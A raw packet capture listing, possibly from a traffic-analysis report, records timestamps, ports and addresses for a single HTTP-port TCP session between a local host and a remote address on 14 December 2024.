Dec 14, 2024 12:56:16.364732027 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.369191885 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.369266987 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.369395018 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.369473934 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.373912096 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.373980999 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.374206066 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.374275923 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.378670931 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.378753901 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.378981113 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.379060984 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.383430958 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.383507013 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.383635998 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.383702993 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.387273073 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.387355089 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.387518883 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.387593985 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.391486883 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.391565084 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.391627073 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.391771078 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.394995928 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.395064116 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.395102024 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.395164967 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.398833990 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.398916960 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.398945093 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.398998976 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.402698040 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.402792931 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.402813911 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.402878046 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.406574965 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.406645060 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.406771898 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.406831026 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.445509911 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.445524931 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.445724010 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.447241068 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.447252035 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.447357893 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.450958967 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.450997114 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.451046944 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.451128006 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.516155005 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.516181946 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.516510963 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.517556906 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.517823935 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.518119097 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.518235922 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.518326044 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.518326044 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.521037102 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.521106958 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.521296978 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.521364927 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.523957968 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.524007082 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.524024963 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.524068117 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.526937008 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.527030945 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.527121067 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.527121067 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.529757977 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.529823065 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.529876947 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.529937029 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.532692909 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.532752037 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.532896042 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.533071041 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.535382032 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.535450935 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.535581112 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.535645962 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.538224936 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.538292885 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.538398027 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.538463116 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.540765047 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.540827036 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.540844917 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.540908098 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.543215036 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.543273926 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.543301105 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.543355942 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.545861006 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.545929909 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.545973063 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.546032906 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.548552990 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.548619032 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.548660040 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.548717976 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.551244020 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.551301956 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.551351070 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.551410913 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.553966045 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.554027081 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.554027081 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.554080963 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.556642056 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.556704044 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.556744099 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.556812048 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.559281111 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.559355974 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.559396029 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.559453964 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.561964989 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.562022924 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.562088966 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.562146902 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.564774036 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.564831018 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.564876080 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.564948082 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.567667007 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.567725897 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.567771912 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.567826033 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.570080042 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.570138931 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.570244074 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.570472956 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.572745085 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.572808027 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.572832108 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.572890043 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.574728966 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.574788094 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.574855089 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.574913025 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.576865911 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.576927900 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.576966047 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.577022076 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.578972101 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.579039097 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.579077959 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.579137087 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.580892086 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.580950022 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.581007004 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.581063032 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.582897902 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.582954884 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.583005905 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.583060980 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.584939957 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.585002899 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.585104942 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.585164070 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.586992979 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.587048054 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.587115049 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.587169886 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.589035034 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.589091063 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.589209080 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.589263916 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.591053009 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.591109991 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.591155052 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.591208935 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.593172073 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.593230963 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.593254089 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.593308926 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.710297108 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.710465908 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.710530043 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.710530043 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.710629940 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.710702896 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.710743904 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.710988045 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.712341070 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.712419033 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.712466002 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.712527990 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.713958025 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.714018106 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.714056969 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.714117050 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.715591908 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.715656996 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.715769053 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.715826035 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.717107058 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.717170000 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.717278957 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.717338085 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.718703032 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.718765974 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.718805075 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.718863010 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.720218897 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.720288992 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.720351934 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.720412016 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.721790075 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.721849918 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.721925020 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.721981049 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.723284960 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.723361969 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.723402977 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.723465919 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.724811077 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.724889040 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.724900007 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.724962950 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.726488113 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.726562977 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.726603031 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.726664066 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.727873087 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.727951050 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.728044987 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.728106976 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.729418039 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.729487896 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.729558945 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.729620934 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.731070995 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.731138945 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.731209040 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.731264114 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.732567072 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.732626915 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.732667923 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.732719898 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.734313011 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.734376907 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.734416962 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.734482050 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.735868931 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.735965014 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.735970020 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.736025095 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.737442970 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.737503052 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.737552881 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.737616062 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.738617897 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.738677979 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.738724947 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.738780022 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.740262032 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.740329981 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.740406036 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.740468025 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.742125988 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.742196083 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.742284060 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.742343903 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.743338108 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.743403912 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.743444920 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.743499041 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.744937897 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.745007992 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.745008945 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.745059967 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.746385098 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.746444941 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.746606112 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.746665001 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.747905970 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.747970104 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.748014927 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.748073101 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.749754906 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.749818087 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.749895096 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.749952078 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.751061916 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.751122952 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.751126051 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.751183033 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.752703905 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.752774000 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.752814054 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.752873898 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.754002094 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.754065037 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.754113913 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.754175901 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.755578041 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.755640984 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.755646944 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.755707026 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.757117033 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.757177114 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.757208109 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.757263899 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.758605003 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.758666992 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.758711100 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.758771896 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.760159016 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.760219097 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.760265112 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.760323048 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.761715889 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.761787891 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.761827946 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.761883020 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.763236046 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.763295889 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.763343096 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.763401985 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.764790058 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.764853954 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.764889002 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.764942884 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.766449928 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.766518116 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.766519070 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.766576052 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.767975092 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.768038034 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.768081903 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.768137932 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.769468069 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.769521952 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.769526958 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.769577980 CET	49778	80	192.168.2.4	185.215.113.16
